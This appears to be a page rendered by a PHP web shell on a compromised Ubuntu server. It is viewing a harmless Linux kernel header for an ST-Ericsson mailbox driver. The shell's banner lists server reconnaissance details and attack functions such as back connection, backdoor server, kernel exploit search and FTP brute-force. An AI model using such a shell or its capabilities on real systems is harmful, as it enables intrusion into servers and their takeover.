|
System | : | Linux MiraNet 3.0.0-14-generic-pae #23-Ubuntu SMP Mon Nov 21 22:07:10 UTC 2011 i686 |
Software | : | Apache. PHP/5.3.6-13ubuntu3.10 |
ID | : | uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
|
|
Safe Mode | : | OFF |
Open_Basedir | : | OFF |
Freespace | : | 22.55 GB of 70.42 GB (32.03%) |
|
MySQL: ON MSSQL: OFF Oracle: OFF PostgreSQL: OFF Curl: OFF Sockets: ON Fetch: OFF Wget: ON Perl: ON |
Disabled Functions: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
|
[ System Info ]
[ Processes ]
[ SQL Manager ]
[ Eval ]
[ Encoder ]
[ Mailer ]
[ Back Connection ]
[ Backdoor Server ]
[ Kernel Exploit Search ]
[ MD5 Decrypter ]
[ Reverse IP ]
[ Kill Shell ]
[ FTP Brute-Force ]
|
|
/
usr/
src/
linux-headers-3.0.0-14/
arch/
arm/
mach-ux500/
include/
mach/
- drwxr-xr-x
|
Viewing file: mbox-db5500.h (3.02 KB) -rw-r--r--Select action/file-type:  ( +) |  ( +) |  ( +) | Code ( +) | Session ( +) |  ( +) | SDB ( +) |  ( +) |  ( +) |  ( +) |  ( +) |  ( +) |
/* * Copyright (C) ST-Ericsson SA 2010 * Author: Stefan Nilsson <stefan.xk.nilsson@stericsson.com> for ST-Ericsson. * Author: Martin Persson <martin.persson@stericsson.com> for ST-Ericsson. * License terms: GNU General Public License (GPL), version 2. */
#ifndef __INC_STE_MBOX_H #define __INC_STE_MBOX_H
#define MBOX_BUF_SIZE 16 #define MBOX_NAME_SIZE 8
/** * mbox_recv_cb_t - Definition of the mailbox callback. * @mbox_msg: The mailbox message. * @priv: The clients private data as specified in the call to mbox_setup. * * This function will be called upon reception of new mailbox messages. */ typedef void mbox_recv_cb_t (u32 mbox_msg, void *priv);
/** * struct mbox - Mailbox instance struct * @list: Linked list head. * @pdev: Pointer to device struct. * @cb: Callback function. Will be called * when new data is received. * @client_data: Clients private data. Will be sent back * in the callback function. * @virtbase_peer: Virtual address for outgoing mailbox. * @virtbase_local: Virtual address for incoming mailbox. * @buffer: Then internal queue for outgoing messages. * @name: Name of this mailbox. * @buffer_available: Completion variable to achieve "blocking send". * This variable will be signaled when there is * internal buffer space available. * @client_blocked: To keep track if any client is currently * blocked. * @lock: Spinlock to protect this mailbox instance. * @write_index: Index in internal buffer to write to. * @read_index: Index in internal buffer to read from. * @allocated: Indicates whether this particular mailbox * id has been allocated by someone. */ struct mbox { struct list_head list; struct platform_device *pdev; mbox_recv_cb_t *cb; void *client_data; void __iomem *virtbase_peer; void __iomem *virtbase_local; u32 buffer[MBOX_BUF_SIZE]; char name[MBOX_NAME_SIZE]; struct completion buffer_available; u8 client_blocked; spinlock_t lock; u8 write_index; u8 read_index; bool allocated; };
/** * mbox_setup - Set up a mailbox and return its instance. * @mbox_id: The ID number of the mailbox. 0 or 1 for modem CPU, * 2 for modem DSP. * @mbox_cb: Pointer to the callback function to be called when a new message * is received. * @priv: Client user data which will be returned in the callback. * * Returns a mailbox instance to be specified in subsequent calls to mbox_send. */ struct mbox *mbox_setup(u8 mbox_id, mbox_recv_cb_t *mbox_cb, void *priv);
/** * mbox_send - Send a mailbox message. * @mbox: Mailbox instance (returned by mbox_setup) * @mbox_msg: The mailbox message to send. * @block: Specifies whether this call will block until send is possible, * or return an error if the mailbox buffer is full. * * Returns 0 on success or a negative error code on error. -ENOMEM indicates * that the internal buffer is full and you have to try again later (or * specify "block" in order to block until send is possible). */ int mbox_send(struct mbox *mbox, u32 mbox_msg, bool block);
#endif /*INC_STE_MBOX_H*/
|